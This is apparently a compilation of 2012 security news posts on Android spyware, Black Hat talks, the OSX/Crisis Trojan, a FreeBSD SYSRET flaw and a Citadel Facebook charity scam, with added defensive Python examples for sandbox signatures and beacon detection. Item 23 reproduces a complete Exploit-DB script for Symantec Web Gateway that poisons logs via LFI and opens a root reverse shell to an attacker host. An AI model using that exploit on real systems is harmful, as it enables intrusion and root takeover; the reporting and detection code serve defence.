Download Cuckoo Sandbox: Cuckoo Sandbox v0.4 - cuckoo_0.4.tar.gz Source: Cuckoo Sandbox version 0.4! — PenTestIT
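The change log's "signatures engine" is the piece most worth seeing in code: a signature is a small Python class that walks the results of one analysis run, collects evidence for a behaviour, and returns whether it matched, so that a report can be annotated with severity-ranked findings instead of a raw API trace. The block below is an added, self-contained illustration of that idea written for this page; it is not Cuckoo's own API or schema. The `SAMPLE_RESULTS` dictionary, its `behavior`/`network` layout, the class attribute names and the three signatures are all this example's assumptions, chosen only to resemble how a sandbox report is typically organised.

```python
import re

# Constructed results dictionary standing in for what one sandbox run produces.
# The layout (behavior summary + network section) is an assumption for this
# example, not Cuckoo's real report schema.
SAMPLE_RESULTS = {
    "info": {"md5": "d41d8cd98f00b204e9800998ecf8427e"},
    "behavior": {"summary": {
        "files": [
            r"C:\Users\user\AppData\Local\Temp\~tmp1.exe",
            r"C:\Windows\Temp\log.txt",
        ],
        "keys": [
            r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\updater",
        ],
    }},
    "network": {
        "hosts": ["198.51.100.10", "203.0.113.7"],
        "dns": [{"hostname": "cdn.example.net", "ip": "198.51.100.10"}],
    },
}


class Signature:
    """One behavioural pattern. Subclasses set metadata and implement run()."""
    name = ""
    description = ""
    severity = 1          # 1 informational, 2 suspicious, 3 malicious
    categories = ()

    def __init__(self):
        self.data = []    # evidence gathered while matching, shown in the report

    def run(self, results) -> bool:
        raise NotImplementedError


class DropsExecutableInTemp(Signature):
    name = "drops_exe_in_temp"
    description = "Writes an executable into a Temp directory"
    severity = 2
    categories = ("dropper",)

    def run(self, results):
        for path in results["behavior"]["summary"].get("files", []):
            if re.search(r"\\Temp\\[^\\]+\.(exe|dll|scr)$", path, re.I):
                self.data.append({"file": path})
        return bool(self.data)


class PersistsViaRunKey(Signature):
    name = "persists_via_run_key"
    description = "Installs itself in a Run/RunOnce autostart key"
    severity = 3
    categories = ("persistence",)

    def run(self, results):
        for key in results["behavior"]["summary"].get("keys", []):
            if re.search(r"\\CurrentVersion\\Run(Once)?\\", key, re.I):
                self.data.append({"key": key})
        return bool(self.data)


class ConnectsToRawIP(Signature):
    name = "connects_to_raw_ip"
    description = "Contacts an IP address that was never resolved through DNS"
    severity = 2
    categories = ("network",)

    def run(self, results):
        net = results.get("network", {})
        resolved = {d["ip"] for d in net.get("dns", [])}
        for host in net.get("hosts", []):
            if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host) and host not in resolved:
                self.data.append({"ip": host})
        return bool(self.data)


ALL_SIGNATURES = [DropsExecutableInTemp, PersistsViaRunKey, ConnectsToRawIP]


def run_signatures(results, signatures=ALL_SIGNATURES):
    """Run each signature over the results; return matches, most severe first."""
    matched = []
    for cls in signatures:
        sig = cls()          # fresh instance so self.data does not leak between runs
        if sig.run(results):
            matched.append({"name": sig.name, "severity": sig.severity,
                            "description": sig.description, "data": sig.data})
    return sorted(matched, key=lambda m: -m["severity"])


def verdict(results):
    """Collapse matches into a single label a report or pipeline can act on."""
    matches = run_signatures(results)
    top = max((m["severity"] for m in matches), default=0)
    return {0: "clean", 1: "informational", 2: "suspicious", 3: "malicious"}[top]


if __name__ == "__main__":
    for m in run_signatures(SAMPLE_RESULTS):
        print("[sev %d] %s: %s" % (m["severity"], m["name"], m["data"]))
    print("verdict:", verdict(SAMPLE_RESULTS))
```

The design point is that each signature instance owns its evidence list and is created fresh per run, so one sample's matches never bleed into the next, and the engine only sorts and labels; the real analysis knowledge stays in small, individually testable classes that an analyst can add without touching the core.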
  20. Android Hackers will demonstrate Fully loaded Spying Applications & Mobile Botnet | The Hacker News Posted On 7/25/2012 01:04:00 PM By THN Security Analyst This Sunday, the capital, New Delhi, plays host to an international event, The Hackers Conference, where blackhat hackers will discuss the challenges of cyber safety with security agencies. Your smartphone is an always-on and always-connected digital extension of your life, which attackers will use to covertly steal your sensitive data and spy on you. Mahesh Rakheja, an independent security researcher and Android developer/hacker, will demonstrate "Android Spy Agent". This application allows an attacker to remotely access the victim's entire personal information, including the confidential data stored on the Android phone. The personal information includes the victim's contacts, call logs, messages, browser history, GPS location and much more that is directly available on the victim's phone. Many times we wonder whether there is any way to read someone's private SMS messages; Mr. Mahesh will present his answer on The Hackers Conference 2012 platform, with hundreds of advanced features. The application also allows the attacker to remotely delete data on the victim's phone. For the application to work, you have to gain access to the victim's Android phone for at least 20 seconds: install the application and then restart the phone. After the restart, the application starts automatically on the victim's phone. From then on you can query the victim's phone information from any ordinary phone and receive the response on it. The Android spy agent stays hidden on the victim's phone and does not allow the victim to easily uninstall or delete it. In another talk, Android hackers Aditya Gupta and Subho Halder will present "All your Droids belong to me: A look into Mobile Security in 2012". 
The researchers have developed, and will demonstrate, malware for Android phones that can be used as a spam botnet. "The talk is about Android Malwares, Botnets and all the crazy stuff you have been hearing in the past. We will give an inside view on how the black hat underground uses this, to earn 5-6 digit income per month. For this, We will start off with creating an Android Malware, and then will gradually move on to the Botnet Part.", Aditya Gupta said. Maintaining that a wide variety of services is being offered on mobile platforms without proper security implementation, Anurag Kumar Jain and Devendra Shanbhag from Tata Consultancy Services will deliberate on the topic "Mobile Application Security Risk and Remediation". They will highlight the need for application security in mobile applications, the threats in a mobile environment, and the key security issues that can creep into mobile applications, and suggest a secure development approach which can possibly safeguard mobile applications from becoming "sitting ducks" for attackers and mobile malware. Experts from countries like Iran and Argentina will share space with Indian speakers in the day-long discussion at the India Habitat Centre. Yet another important issue The Hackers Conference 2012 will deliberate on is Internet censorship in India. For more details, go to www.thehackersconference.com Source: Android Hackers will demonstrate Fully loaded Spying Applications & Mobile Botnet | The Hacker News
  21. Security researchers will disclose vulnerabilities in Embedded, ARM, x86 & NFC | The Hacker News Posted On 7/25/2012 12:33:00 PM By THN Security Analyst Security researchers are expected to disclose new vulnerabilities in near field communication (NFC), mobile baseband firmware, HTML5 and Web application firewalls next week at the Black Hat USA 2012 security conference. The Black Hat sessions aim to expose sometimes shocking vulnerabilities in widely used products; they also typically show countermeasures to plug the holes. Two independent security consultants will give a class called "Advanced ARM Exploitation," part of a broader five-day private class the duo developed. In a sold-out session, they will detail hardware hacks of multiple ARM platforms running Linux, some described in a separate blog posting. The purpose of the talk is to reach a broader audience and share the more interesting bits of the research that went into developing the Practical ARM Exploitation class; presenters Stephen Ridley and Stephen Lawler will demonstrate how to defeat XN, ASLR, stack cookies, etc. using nuances of the ARM architecture on Linux. In addition to mobile and Web security, Black Hat presentations will also cover security issues and attack techniques affecting industrial control systems, smart meters and embedded devices. Source: Security researchers will disclose vulnerabilities in Embedded, ARM, x86 & NFC | The Hacker News
  22. New Mac Trojan installs silently, no password required Summary: A new Mac OS X Trojan referred to as OSX/Crisis silently infects OS X 10.6 Snow Leopard and OS X 10.7 Lion. The threat was created in a way that is intended to make reverse engineering more difficult, an added extra that is more common with Windows malware than it is with Mac malware. By Emil Protalinski for Zero Day | July 24, 2012 -- 23:00 GMT (16:00 PDT) A new Mac OS X Trojan has been discovered that drops different components depending on whether or not it is executed on a user account with Admin permissions. The threat installs itself silently (no user interaction required) and also does not need your user password to infect your Apple Mac. The backdoor component calls home to the IP address 176.58.100.37 every five minutes, awaiting instructions. Intego, which had to update its anti-malware signatures upon discovering the threat, refers to it as "OSX/Crisis." The good news is that the security firm has yet to find OSX/Crisis in the wild; the company only stumbled upon it over at VirusTotal, a service for analyzing suspicious files and URLs. This Trojan is like most: when run, it installs silently to create a backdoor. What makes this threat particularly worrying is that depending on whether or not it runs on a user account with Admin permissions, it will install different components, which use low-level system calls to hide their activities. Either way, it will always create a number of files and folders to complete its tasks. If the dropper runs on a system with Admin permissions, it will drop a rootkit to hide itself. The malware creates 17 files when it's run with Admin permissions, 14 files when it's run without. Many of these are randomly named, but there are some that are consistent. 
With or without Admin permissions, this folder is created: /Library/ScriptingAdditions/appleHID/ Only with Admin permissions, this folder is created: /System/Library/Frameworks/Foundation.framework/XPCServices/ Here's where it gets interesting. "The file is created in a way that is intended to make reverse engineering tools more difficult to use when analyzing the file," an Intego spokesperson said in a statement. "This sort of anti-analysis technique is common in Windows malware, but is relatively uncommon for OS X malware." Curiously, this particular malware only affects OS X 10.6 Snow Leopard and OS X 10.7 Lion. The latest threat further underlines the importance of protecting Macs against malware with an updated antivirus program as well as the latest security updates. That means you should start by getting OS X 10.8 Mountain Lion when it comes out Wednesday (although it's currently unclear whether OSX/Crisis or Mac security software will work on it). Source: New Mac Trojan installs silently, no password required | ZDNet
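The article hands a responder two concrete indicators: the two folders OSX/Crisis creates, and a backdoor that contacts 176.58.100.37 every five minutes. The script below is an added example written for this page, not code from ZDNet or Intego. It checks a Mac for those folders and, more usefully, scans a connection log for the five-minute beaconing rhythm rather than for a single hit on the IP, since one contact with an address is weak evidence while an evenly spaced run of contacts is what a backdoor's timer looks like. The log format and its records are constructed for the example, and the IP is the one reported in July 2012; an address that old should be treated as historical and not assumed to still belong to this actor.

```python
import os
from collections import defaultdict
from datetime import datetime

# Host artefacts and network indicator named in the Intego write-up above.
CRISIS_PATHS = [
    "/Library/ScriptingAdditions/appleHID/",                         # created with or without Admin
    "/System/Library/Frameworks/Foundation.framework/XPCServices/",  # created only with Admin (rootkit)
]
CRISIS_C2 = "176.58.100.37"
BEACON_SECONDS = 300        # "calls home ... every five minutes"

# Constructed connection records: "ISO-timestamp source destination", one per line.
SAMPLE_LOG = """
# ts                   src           dst
2012-07-25T09:00:02  10.0.1.23     176.58.100.37
2012-07-25T09:00:10  10.0.1.40     198.51.100.10
2012-07-25T09:05:01  10.0.1.23     176.58.100.37
2012-07-25T09:07:44  10.0.1.40     176.58.100.37
2012-07-25T09:10:03  10.0.1.23     176.58.100.37
2012-07-25T09:12:00  10.0.1.50     176.58.100.37
2012-07-25T09:15:00  10.0.1.23     176.58.100.37
2012-07-25T13:12:00  10.0.1.50     176.58.100.37
"""


def present_artifacts(paths=CRISIS_PATHS, exists=os.path.exists):
    """Which of the known Crisis folders exist on this host (exists() is injectable)."""
    return [p for p in paths if exists(p)]


def parse_connections(text):
    """Parse the constructed log into (datetime, src, dst) tuples, skipping comments."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst = line.split()
        records.append((datetime.fromisoformat(ts), src, dst))
    return records


def beacons(records, c2=CRISIS_C2, period=BEACON_SECONDS, tolerance=15, min_hits=3):
    """Flag source hosts whose connections to c2 recur at roughly `period` seconds.

    Returns {src: number of contacts in the periodic run}. `tolerance` absorbs
    timer jitter and logging skew; `min_hits` keeps two coincidental contacts
    from being called a beacon.
    """
    by_src = defaultdict(list)
    for ts, src, dst in records:
        if dst == c2:
            by_src[src].append(ts)
    flagged = {}
    for src, times in by_src.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        periodic = [g for g in gaps if abs(g - period) <= tolerance]
        if len(periodic) + 1 >= min_hits:      # n periodic gaps span n+1 contacts
            flagged[src] = len(periodic) + 1
    return flagged


def contacted_c2(records, c2=CRISIS_C2):
    """Every host that touched the indicator at all, periodic or not."""
    return sorted({src for _, src, dst in records if dst == c2})


if __name__ == "__main__":
    print("artifacts present:", present_artifacts())
    recs = parse_connections(SAMPLE_LOG)
    print("hosts that contacted C2:", contacted_c2(recs))
    print("hosts beaconing on a 5-minute timer:", beacons(recs))
```

In the constructed log, three hosts touch the address but only 10.0.1.23 does so on a 300-second cadence, which is the host to pull for the folder check. The folder check itself needs to run on the suspect Mac; the network scan can run anywhere you have flow or proxy records.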
  23. Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit (Exploit-DB)
EDB-ID: 20064 | CVE: 2012-2957 | OSVDB-ID: N/A
Author: muts | Published: 2012-07-24

#!/usr/bin/env python3
'''
The original patch for the Symantec Web Gateway 5.0.2 LFI vulnerability removed the
/tmp/networkScript file but left the entry in /etc/sudoers, allowing us to simply
recreate the file and obtain a root shell using a different LFI vulnerability.

Timeline:
# 06 Jun 2012: Vulnerability reported to CERT
# 08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure
'''
import base64
import socket
import sys

print("[*] #########################################################")
print("[*] Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit")
print("[*] Offensive Security - http://www.offensive-security.com")
print("[*] #########################################################\n")

if len(sys.argv) != 4:
    print("[*] Usage: symantec-web-gateway-0day.py <RHOST> <LHOST> <LPORT>")
    sys.exit(0)

rhost, lhost, lport = sys.argv[1], sys.argv[2], sys.argv[3]

# Bash reverse shell written into /tmp/networkScript, which the web server user
# (apache:apache) may still run via sudo because the sudoers entry survived the
# vendor's first patch; sudo then executes it as root.
payload = ("echo '#!/bin/bash' > /tmp/networkScript; "
           "echo 'bash -i >& /dev/tcp/" + lhost + "/" + lport + " 0>&1' >> /tmp/networkScript; "
           "chmod 755 /tmp/networkScript; sudo /tmp/networkScript")
payloadencoded = base64.b64encode(payload.encode()).decode()

# Step 1: poison the Apache access log with a PHP stub that decodes and runs the payload.
taint = "GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded
# Step 2: include the poisoned log through the LFI; %00 truncates anything the
# script appends to the supplied path.
trigger = ("GET /spywall/languageTest.php?&language=../../../../../../../../"
           "usr/local/apache2/logs/access_log%00 HTTP/1.0\r\n\r\n")


def send_raw(host, request):
    """Open a plain TCP connection to port 80, send one raw HTTP request, close."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, 80))
    s.send(request.encode())
    s.close()


print("[*] Super Sudo Backdoor injection, w00t")
send_raw(rhost, taint)
print("[*] Triggering Payload ...3,2,1 ")
send_raw(rhost, trigger)
print("[*] Can you haz shell on %s %s ?\n" % (lhost, lport))
  24. CVE-2012-0217 - Intel SYSRET FreeBSD Privilege Escalation Exploit Released Posted On 7/25/2012 09:06:00 AM By THN Security Analyst The vulnerability, reported on 06/12/2012 and dubbed "CVE-2012-0217", affects some 64-bit operating systems and virtualization software running on Intel CPU hardware, which are vulnerable to a local privilege escalation attack. The vulnerability may be exploited for local privilege escalation or a guest-to-host virtual machine escape. FreeBSD/amd64 runs on CPUs from different vendors. Due to the varying behaviour of CPUs in 64-bit mode, a sanity check in the kernel may be insufficient when returning from a system call. Successful exploitation of the problem can lead to local kernel privilege escalation, kernel data corruption and/or a crash. The Inj3ct0r team today released a related private exploit on their website, which allows normal FreeBSD users to escalate privileges. All systems running a 64-bit Xen hypervisor with 64-bit PV guests on Intel CPUs are vulnerable to this issue. However, FreeBSD/amd64 running on AMD CPUs is not vulnerable to this particular problem. Systems with 64-bit capable CPUs but running the 32-bit FreeBSD/i386 kernel are not vulnerable, nor are systems running on different processor architectures. Download the relevant patch from the location below:
# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch
# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch.asc
# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81.patch
# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81.patch.asc
[8.1 only, if the original sysret.patch has already been applied]
# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81-correction.patch
# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81-correction.patch.asc
How to apply the patch:
# cd /usr/src
# patch < /path/to/patch
Then recompile your kernel as described in the advisory and reboot the system. Systems using binary updates can instead apply the fix with freebsd-update:
# freebsd-update fetch
# freebsd-update install
Source: CVE-2012-0217 - Intel SYSRET FreeBSD Privilege Escalation Exploit Released | The Hacker News
  25. Facebook virus warning: Massive children charity scam Summary: Cybercriminals have developed a custom piece of malware that injects itself into your Facebook session and prompts you to donate to a charity for sick children. The scammers' goal is to make off with your personal data, especially your credit card number. By Emil Protalinski for Zero Day | July 24, 2012 -- 20:19 GMT (13:19 PDT) Security researchers have discovered a new variant of the Citadel malware that injects itself into your Facebook webpages and demands that you make a donation to a fake charity for sick children. Please be warned: there are no children's charities that will ask you for a donation via Facebook. There are, however, individuals very interested in stealing your credit card number and other personal information. Once your computer is infected with the malware, it quickly adds itself into your Facebook session, as you can see above. After you log into your Facebook account, the Citadel injection mechanism displays a pop up that encourages you to donate $1 to children who "desperately" need humanitarian aid. Next, it asks you for your name, credit card number, expiration date, CVV, and security password. What makes this attack particularly sophisticated is that the malware is configured to use different scam text depending on your country and language, according to Trusteer. The scammers use domains such as hopeforthepoorchildren.org, fundcauses.com, lwbspain.blogspot.ca, and childfund.de to push the scam in at least five different languages: English, Italian, Spanish, German, and Dutch. The English version of the attack asks you to make a $1 donation for Haitian children living in poverty. Here's the text in question (please note that the scammers can change the scam's wording as they please): You can save a life with only $1. When you give to HPC, 99% of every dollar "cash plus gifts-in-kind" goes directly to programs that serve the poorest child in Haiti. 
We work currently with two orphanages and elementary school, we are seeking donations. Please donate and help us spread the word to your friends, families, etc. Click to donate to make a difference! All you give, they'll be much appreciated. We appreciate your interest and hope that you will open your hearts and donate to better the lives and futures of those in need. If you have any questions before you donate please do not hesitate to contact us. We treat personal information with the utmost respect for your privacy. Click the button above. Thank you. The Italian version exploits the Red Balloon campaign that was created to fight child mortality in Italy. The criminals claim that the campaign has already collected more than 1 million euros for sick children and point out that more than 7 million children die from basic illnesses each year. Here's the text in question (again, the scammers can change the scam's wording as they please): Gonfia un palloncino rosso e salva la vita di un bambino con Save the Children! NOTA: Il palloncino rosso di Save the Children, simbolo della lotta alla mortalità infantile non si è mai fermato e con la campagna Every One sono stati già raccolti più di un milione di euro. Ogni anno, nel mondo, più di 7 milioni di bambini muoiono per cause facilmente curabili: continua a sostenere i progetti di Save the Children per salvarli! (Translation: Inflate a red balloon and save a child's life with Save the Children! NOTE: Save the Children's red balloon, symbol of the fight against child mortality, has never stopped, and the Every One campaign has already raised more than one million euros. Every year, worldwide, more than 7 million children die of easily treatable causes: keep supporting Save the Children's projects to save them!) Trusteer found that the Spanish version had a bug in the injection code which defaults to the English version of the text. The fraudsters' intention was to exploit a well-known Spanish nutrition program for infants and children, which collects donations as well as purchases, and then sends pictures of the children to donors. A bit of searching on Google leads me to believe that this is the Spanish text that you're supposed to see: Estos pequeños, puestos en fila para la foto, son parte de nuestro programa de nutrición en Jiangmen, Provincia de Guangdong. El programa empezó en el 2011 cuando un padre adoptante llamó nuestra atención sobre las necesidad de estos niños de tener leche enriquecida. Nuestro programa es tan pequeño como nuevo, pero servimos a unos 10 bebés y niños. Mandamos un cargamento de leche trimestralmente y recibimos nuevas fotos de los niños a cambio. Con el aumento del precio de la leche, se ha vuelto mas y mas duro mantener los biberones llenos! Puedes marcar la diferencia en la vida de un niño con una donación mensual de 20 euros, o con una donación puntual de cualquier cantidad. Los donantes recibirán fotos y actualizaciones trimestrales. (Translation: These little ones, lined up for the photo, are part of our nutrition programme in Jiangmen, Guangdong Province. The programme began in 2011 when an adoptive father drew our attention to these children's need for fortified milk. Our programme is as small as it is new, but we serve about 10 babies and children. We send a shipment of milk every quarter and receive new photos of the children in return. With the rising price of milk, it has become harder and harder to keep the bottles full! You can make a difference in a child's life with a monthly donation of 20 euros, or a one-off donation of any amount. Donors will receive quarterly photos and updates.) The German version urges you to make a donation to ChildFund. Here's the text in question (the scammers can change the scam's wording as they please): Einmalig oder regelmäßig – jeder Beitrag hilft. Mit jedem noch so kleinen Betrag unterstützen Sie unser gemeinsames Anliegen, hilfsbedürftigen Kindern und ihren Familien eine Zukunft zu schenken, die sie ohne unsere Hilfe nicht hätten. Ihre Spende dauert nur wenige Minuten und zahlt sich für Kinder in Not um ein Vielfaches aus. Helfen Sie mit! Spenden Sie Hoffnung. Weil jeder Tag zählt! Für Ihr Engagement bedanken wir uns schon jetzt sehr herzlich. (Translation: One-off or regular, every contribution helps. With even the smallest amount you support our shared cause: giving children in need and their families a future they would not have without our help. Your donation takes only a few minutes and pays off many times over for children in need. Help us! Donate hope. Because every day counts! We thank you warmly in advance for your commitment.) The Dutch version asks you for a donation to Save the Children. The following text was not reposted anywhere online, leading me to believe that this one has already been changed by the cybercriminals to something else: Save the Children zet zich al 90 jaar in om kinderlevens te redden, hun dromen te verwezelijken en hun toekomst een kans te geven. We redden kinderlevens, vechten voor hun rechten en helpen kinderen groeien. Zo redden we de dromen en de toekomst van kinderen. Steun ons eenmalig 1 eur (Translation: Save the Children has been working for 90 years to save children's lives, make their dreams come true and give their future a chance. We save children's lives, fight for their rights and help children grow. In this way we save the dreams and the future of children. Support us with a one-off 1 eur) This attack is a massive undertaking. The cybercriminals behind this scam are likely very well organized and have been pushing very hard to spread it on Facebook. 
If you've discovered that you are affected by this attack, use an antivirus program (such as Microsoft Security Essentials) to clean your system before using the social network again. "This attack illustrates the continuing customization of financial malware and harvesting of credit card data from the global base of Facebook users. Using children's charities as a scam makes this attack believable and effective," a Trusteer spokesperson said in a statement. "Meanwhile, the one dollar donation amount is low enough that virtually anyone can contribute if they choose. This is a well-designed method for stealing credit and debit card data on a massive scale." As a general word of caution, don't hand over any of your credentials via Facebook unless you are absolutely certain that it's coming from the social network. If you want to warn Facebook about this scam, feel free to contact Facebook Security. Source: Facebook virus warning: Massive children charity scam | ZDNet